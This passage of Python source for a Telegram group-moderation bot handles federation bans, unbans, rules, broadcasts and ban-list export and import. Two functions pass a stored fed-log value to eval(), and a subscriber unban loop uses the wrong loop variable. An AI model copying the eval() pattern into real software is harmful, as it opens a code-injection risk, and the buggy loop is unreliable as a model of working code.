isvalid and user_chat.type != \"private\":\n send_message(update.effective_message, \"That's so not a user!\")\n return\n\n if isvalid:\n user_target = mention_html(fban_user_id, fban_user_name)\n else:\n user_target = fban_user_name\n\n if fban:\n fed_name = info[\"fname\"]\n if reason == \"\":\n reason = \"No reason given.\"\n\n temp = sql.un_fban_user(fed_id, fban_user_id)\n if not temp:\n message.reply_text(\"Failed to update the reason for fedban!\")\n return\n x = sql.fban_user(\n fed_id,\n fban_user_id,\n fban_user_name,\n fban_user_lname,\n fban_user_uname,\n reason,\n int(time.time()),\n )\n if not x:\n message.reply_text(\"Failed to ban from the federation!\")\n return\n\n fed_chats = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"New FederationBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n for fedschat in fed_chats:\n try:\n # Do not spam all fed chats\n \"\"\"\n context.bot.send_message(chat, \"FedBan reason updated\" \\\n \"\\nFederation: {}\" \\\n \"\\nFederation Admin: {}\" \\\n \"\\nUser: {}\" \\\n \"\\nUser ID: {}\" \\\n \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason), parse_mode=\"HTML\")\n \"\"\"\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n 
dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n sql.chat_leave_fed(fedschat)\n LOGGER.info(\n \"Chat {} has leave fed {} because I was kicked\".\n format(fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on {} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n # Also do not spam all fed admins\n\n # send_to_list(bot, FEDADMIN,\n # \"FedBan reason updated\" \\\n # \"\\nFederation: {}\" \\\n # \"\\nFederation Admin: {}\" \\\n # \"\\nUser: {}\" \\\n # \"\\nUser ID: {}\" \\\n # \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason),\n # html=True)\n\n # Fban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\" .format(\n fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n # send_message(update.effective_message, \"Fedban Reason has been updated.\")\n return\n\n fed_name = info[\"fname\"]\n\n starting = \"Starting a federation ban for {} in the Federation {}.\".format(\n user_target, fed_name)\n update.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n if reason == \"\":\n reason = \"No reason given.\"\n\n x = sql.fban_user(\n fed_id,\n fban_user_id,\n fban_user_name,\n fban_user_lname,\n fban_user_uname,\n reason,\n int(time.time()),\n )\n if not x:\n message.reply_text(\"Failed to ban from the federation!\")\n return\n\n fed_chats = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n chats_in_fed = 0\n for fedschat in fed_chats:\n chats_in_fed += 1\n try:\n # Do not spamming all fed chats\n \"\"\"\n context.bot.send_message(chat, \"FedBan reason updated\" \\\n \"\\nFederation: {}\" \\\n 
\"\\nFederation Admin: {}\" \\\n \"\\nUser: {}\" \\\n \"\\nUser ID: {}\" \\\n \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason), parse_mode=\"HTML\")\n \"\"\"\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n pass\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on {} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n\n # Also do not spamming all fed admins\n \"\"\"\n\t\tsend_to_list(bot, FEDADMIN,\n\t\t\t\t \"FedBan reason updated\" \\\n\t\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser ID: {}\" \\\n\t\t\t\t\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason),\n\t\t\t\t\t\t\thtml=True)\n\t\t\"\"\"\n\n # Fban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\" .format(\n fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n if chats_in_fed == 0:\n send_message(update.effective_message, \"Fedban affected 0 chats. \")\n elif chats_in_fed > 0:\n send_message(update.effective_message,\n \"Fedban affected {} chats. \".format(chats_in_fed))\n\n\n@run_async\ndef unfban(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! 
\",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n info = sql.get_fed_info(fed_id)\n getfednotif = sql.user_feds_report(info[\"owner\"])\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n user_id = extract_user_fban(message, args)\n if not user_id:\n message.reply_text(\"You do not seem to be referring to a user.\")\n return\n\n try:\n user_chat = context.bot.get_chat(user_id)\n isvalid = True\n fban_user_id = user_chat.id\n fban_user_name = user_chat.first_name\n fban_user_lname = user_chat.last_name\n fban_user_uname = user_chat.username\n except BadRequest as excp:\n if not str(user_id).isdigit():\n send_message(update.effective_message, excp.message)\n return\n if len(str(user_id)) != 9:\n send_message(update.effective_message, \"That's so not a user!\")\n return\n isvalid = False\n fban_user_id = int(user_id)\n fban_user_name = \"user({})\".format(user_id)\n fban_user_lname = None\n fban_user_uname = None\n\n if isvalid and user_chat.type != \"private\":\n message.reply_text(\"That's so not a user!\")\n return\n\n if isvalid:\n user_target = mention_html(fban_user_id, fban_user_name)\n else:\n user_target = fban_user_name\n\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, fban_user_id)\n if fban is False:\n message.reply_text(\"This user is not fbanned!\")\n return\n\n message.reply_text(\"I'll give {} another chance in this federation\".format(\n user_chat.first_name))\n\n chat_list = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n unfbanned_in_chats = 0\n for fedchats in chat_list:\n unfbanned_in_chats += 1\n try:\n member = context.bot.get_chat_member(fedchats, user_id)\n if member.status == \"kicked\":\n context.bot.unban_chat_member(fedchats, user_id)\n # Do not spamming all fed chats\n \"\"\"\n\t\t\tcontext.bot.send_message(chat, \"Un-FedBan\" \\\n\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name), user_target, fban_user_id), parse_mode=\"HTML\")\n\t\t\t\"\"\"\n except BadRequest as excp:\n if excp.message in UNFBAN_ERRORS:\n pass\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on 
{} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n\n try:\n x = sql.un_fban_user(fed_id, user_id)\n if not x:\n send_message(\n update.effective_message,\n \"Un-fban failed, this user may already be un-fedbanned!\",\n )\n return\n except Exception:\n pass\n\n # UnFban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.unban_chat_member(fedchats, user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\"\n .format(fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n\n if unfbanned_in_chats == 0:\n send_message(update.effective_message,\n \"This person has been un-fbanned in 0 chats.\")\n if unfbanned_in_chats > 0:\n send_message(\n update.effective_message,\n \"This person has been un-fbanned in {} chats.\".format(\n unfbanned_in_chats),\n )\n # Also do not spamming all fed admins\n \"\"\"\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tfor x in FEDADMIN:\n\t\tgetreport = sql.user_feds_report(x)\n\t\tif getreport == False:\n\t\t\tFEDADMIN.remove(x)\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"Un-FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user_chat.id),\n\t\t\thtml=True)\n\t\"\"\"\n\n\n@run_async\ndef set_frules(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\"Only fed admins can do this!\")\n return\n\n if len(args) >= 1:\n msg = update.effective_message # type: Optional[Message]\n raw_text = msg.text\n # use python's maxsplit to separate cmd and args\n args = raw_text.split(None, 1)\n if len(args) == 2:\n txt = args[1]\n # set correct offset relative to command\n offset = len(txt) - len(raw_text)\n markdown_rules = markdown_parser(txt,\n entities=msg.parse_entities(),\n offset=offset)\n x = sql.set_frules(fed_id, markdown_rules)\n if not x:\n update.effective_message.reply_text(\n \"Big F! 
There is an error while setting federation rules!\")\n return\n\n rules = sql.get_fed_info(fed_id)[\"frules\"]\n getfed = sql.get_fed_info(fed_id)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"*{}* has changed federation rules for fed *{}*\".format(\n user.first_name, getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n update.effective_message.reply_text(\n f\"Rules have been changed to :\\n{rules}!\")\n else:\n update.effective_message.reply_text(\"Please write rules to set it up!\")\n\n\n@run_async\ndef get_frules(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n if not fed_id:\n update.effective_message.reply_text(\n \"This chat is not in any federation!\")\n return\n\n rules = sql.get_frules(fed_id)\n text = \"*Rules in this fed:*\\n\"\n text += rules\n update.effective_message.reply_text(text, parse_mode=ParseMode.MARKDOWN)\n\n\n@run_async\ndef fed_broadcast(update, context):\n msg = update.effective_message # type: Optional[Message]\n user = update.effective_user # type: Optional[User]\n chat = update.effective_chat # type: Optional[Chat]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n chat = update.effective_chat # type: Optional[Chat]\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n # Parsing md\n raw_text = msg.text\n # use python's maxsplit to separate cmd and args\n args = raw_text.split(None, 1)\n txt = args[1]\n # set correct offset relative to command\n offset = len(txt) - len(raw_text)\n text_parser = markdown_parser(txt,\n entities=msg.parse_entities(),\n offset=offset)\n text = text_parser\n try:\n broadcaster = user.first_name\n except BaseException:\n broadcaster = user.first_name + \" \" + user.last_name\n text += \"\\n\\n- {}\".format(mention_markdown(user.id, broadcaster))\n chat_list = sql.all_fed_chats(fed_id)\n failed = 0\n for chat in chat_list:\n title = \"*New broadcast from Fed {}*\\n\".format(fedinfo[\"fname\"])\n try:\n context.bot.sendMessage(chat,\n title + text,\n parse_mode=\"markdown\")\n except TelegramError:\n try:\n dispatcher.bot.getChat(chat)\n except Unauthorized:\n failed += 1\n sql.chat_leave_fed(chat)\n LOGGER.info(\n \"Chat {} has leave fed {} because I was kicked\".format(\n chat, fedinfo[\"fname\"]))\n continue\n failed += 1\n LOGGER.warning(\"Couldn't send broadcast to {}\".format(\n str(chat)))\n\n send_text = \"The federation broadcast is complete\"\n if failed >= 1:\n send_text += \"{} the group failed to receive the message, probably because it left the Federation.\".format(\n failed)\n update.effective_message.reply_text(send_text)\n\n\n@run_async\n@send_action(ChatAction.UPLOAD_DOCUMENT)\ndef fed_ban_list(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n chat_data = context.chat_data\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! 
\",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only Federation owners can do this!\")\n return\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n getfban = sql.get_all_fban_users(fed_id)\n if len(getfban) == 0:\n update.effective_message.reply_text(\n \"The federation ban list of {} is empty\".format(info[\"fname\"]),\n parse_mode=ParseMode.HTML,\n )\n return\n\n if args:\n if args[0] == \"json\":\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can backup your data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n backups = \"\"\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n json_parser = {\n \"user_id\": users,\n \"first_name\": getuserinfo[\"first_name\"],\n \"last_name\": getuserinfo[\"last_name\"],\n \"user_name\": getuserinfo[\"user_name\"],\n \"reason\": getuserinfo[\"reason\"],\n }\n backups += json.dumps(json_parser)\n backups += \"\\n\"\n with BytesIO(str.encode(backups)) as output:\n output.name = \"julia_fbanned_users.json\"\n update.effective_message.reply_document(\n document=output,\n filename=\"julia_fbanned_users.json\",\n caption=\"Total {} User are blocked by the Federation {}.\".\n format(len(getfban), info[\"fname\"]),\n )\n return\n if args[0] == \"csv\":\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n backups = \"id,firstname,lastname,username,reason\\n\"\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n backups += (\n \"{user_id},{first_name},{last_name},{user_name},{reason}\".\n format(\n user_id=users,\n first_name=getuserinfo[\"first_name\"],\n last_name=getuserinfo[\"last_name\"],\n user_name=getuserinfo[\"user_name\"],\n reason=getuserinfo[\"reason\"],\n ))\n backups += \"\\n\"\n with BytesIO(str.encode(backups)) as output:\n output.name = \"julia_fbanned_users.csv\"\n update.effective_message.reply_document(\n document=output,\n filename=\"julia_fbanned_users.csv\",\n caption=\"Total {} User are blocked by Federation {}.\".\n format(len(getfban), info[\"fname\"]),\n )\n return\n\n text = \"{} users have been banned from the federation {}:\\n\".format(\n len(getfban), info[\"fname\"])\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n if getuserinfo is 
False:\n text = \"There are no users banned from the federation {}\".format(\n info[\"fname\"])\n break\n user_name = getuserinfo[\"first_name\"]\n if getuserinfo[\"last_name\"]:\n user_name += \" \" + getuserinfo[\"last_name\"]\n text += \" • {} ({})\\n\".format(\n mention_html(users, user_name), users)\n\n try:\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n except BaseException:\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", text)\n with BytesIO(str.encode(cleantext)) as output:\n output.name = \"fbanlist.txt\"\n update.effective_message.reply_document(\n document=output,\n filename=\"fbanlist.txt\",\n caption=\"The following is a list of users who are currently fbanned in the Federation {}.\" .format(\n info[\"fname\"]),\n )\n\n\n@run_async\ndef fed_notif(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if args:\n if args[0] in (\"yes\", \"on\"):\n sql.set_feds_setting(user.id, True)\n msg.reply_text(\n \"Reporting Federation back up! Every user who is fban / unfban you will be notified via PM.\"\n )\n elif args[0] in (\"no\", \"off\"):\n sql.set_feds_setting(user.id, False)\n msg.reply_text(\n \"Reporting Federation has stopped! Every user who is fban / unfban you will not be notified via PM.\"\n )\n else:\n msg.reply_text(\"Please enter `on`/`off`\", parse_mode=\"markdown\")\n else:\n getreport = sql.user_feds_report(user.id)\n msg.reply_text(\n \"Your current Federation report preferences: `{}`\".format(\n getreport),\n parse_mode=\"markdown\",\n )\n\n\n@run_async\ndef fed_chats(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! 
\",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n getlist = sql.all_fed_chats(fed_id)\n if len(getlist) == 0:\n update.effective_message.reply_text(\n \"No users are fbanned from the federation {}\".format(\n info[\"fname\"]),\n parse_mode=ParseMode.HTML,\n )\n return\n\n text = \"New chat joined the federation {}:\\n\".format(info[\"fname\"])\n for chats in getlist:\n try:\n chat_name = dispatcher.bot.getChat(chats).title\n except Unauthorized:\n sql.chat_leave_fed(chats)\n LOGGER.info(\"Chat {} has leave fed {} because I was kicked\".format(\n chats, info[\"fname\"]))\n continue\n text += \" • {} ({})\\n\".format(chat_name, chats)\n\n try:\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n except BaseException:\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", text)\n with BytesIO(str.encode(cleantext)) as output:\n output.name = \"fedchats.txt\"\n update.effective_message.reply_document(\n document=output,\n filename=\"fedchats.txt\",\n caption=\"Here is a list of all the chats that joined the federation {}.\" .format(\n info[\"fname\"]),\n )\n\n\n@run_async\ndef fed_import_bans(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n chat_data = context.chat_data\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! 
\",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n # info = sql.get_fed_info(fed_id)\n getfed = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only Federation owners can do this!\")\n return\n\n if msg.reply_to_message and msg.reply_to_message.document:\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can get your data once every 30 minutes!\\nYou can get data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n # if int(int(msg.reply_to_message.document.file_size)/1024) >= 200:\n # \tmsg.reply_text(\"This file is too big!\")\n # \treturn\n success = 0\n failed = 0\n try:\n file_info = context.bot.get_file(\n msg.reply_to_message.document.file_id)\n except BadRequest:\n msg.reply_text(\n \"Try downloading and re-uploading the file, this one seems broken!\"\n )\n return\n fileformat = msg.reply_to_message.document.file_name.split(\".\")[-1]\n if fileformat == \"json\":\n multi_fed_id = []\n multi_import_userid = []\n multi_import_firstname = []\n multi_import_lastname = []\n multi_import_username = []\n multi_import_reason = []\n with BytesIO() as file:\n file_info.download(out=file)\n file.seek(0)\n reading = file.read().decode(\"UTF-8\")\n splitting = reading.split(\"\\n\")\n for x in splitting:\n if x == \"\":\n continue\n try:\n data = json.loads(x)\n except json.decoder.JSONDecodeError:\n failed += 1\n continue\n try:\n # Make sure it int\n import_userid = int(data[\"user_id\"])\n import_firstname = str(data[\"first_name\"])\n import_lastname = str(data[\"last_name\"])\n import_username = str(data[\"user_name\"])\n import_reason = str(data[\"reason\"])\n except ValueError:\n failed += 1\n continue\n # Checking user\n if int(import_userid) == context.bot.id:\n failed += 1\n continue\n if is_user_fed_owner(fed_id, import_userid) is True:\n failed += 1\n continue\n if is_user_fed_admin(fed_id, import_userid) is True:\n failed += 1\n continue\n if str(import_userid) == str(OWNER_ID):\n failed += 1\n continue\n if int(import_userid) in OWNER_ID:\n failed += 1\n continue\n\n multi_fed_id.append(fed_id)\n multi_import_userid.append(str(import_userid))\n multi_import_firstname.append(import_firstname)\n multi_import_lastname.append(import_lastname)\n multi_import_username.append(import_username)\n multi_import_reason.append(import_reason)\n success += 1\n sql.multi_fban_user(\n multi_fed_id,\n multi_import_userid,\n multi_import_firstname,\n multi_import_lastname,\n multi_import_username,\n multi_import_reason,\n )\n text = \"Blocks were successfully imported. {} people are blocked.\".format(\n success)\n if failed >= 1:\n text += \" {} Failed to import.\".format(failed)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n teks = \"Fed *{}* has successfully imported data. 
{} banned.\".format(\n getfed[\"fname\"], success)\n if failed >= 1:\n teks += \" {} Failed to import.\".format(failed)\n context.bot.send_message(get_fedlog,\n teks,\n parse_mode=\"markdown\")\n elif fileformat == \"csv\":\n multi_fed_id = []\n multi_import_userid = []\n multi_import_firstname = []\n multi_import_lastname = []\n multi_import_username = []\n multi_import_reason = []\n file_info.download(\"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id))\n with open(\n \"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id),\n \"r\",\n encoding=\"utf8\",\n ) as csvFile:\n reader = csv.reader(csvFile)\n for data in reader:\n try:\n import_userid = int(data[0]) # Make sure it int\n import_firstname = str(data[1])\n import_lastname = str(data[2])\n import_username = str(data[3])\n import_reason = str(data[4])\n except ValueError:\n failed += 1\n continue\n # Checking user\n if int(import_userid) == context.bot.id:\n failed += 1\n continue\n if is_user_fed_owner(fed_id, import_userid) is True:\n failed += 1\n continue\n if is_user_fed_admin(fed_id, import_userid) is True:\n failed += 1\n continue\n if str(import_userid) == str(OWNER_ID):\n failed += 1\n continue\n if int(import_userid) in OWNER_ID:\n failed += 1\n 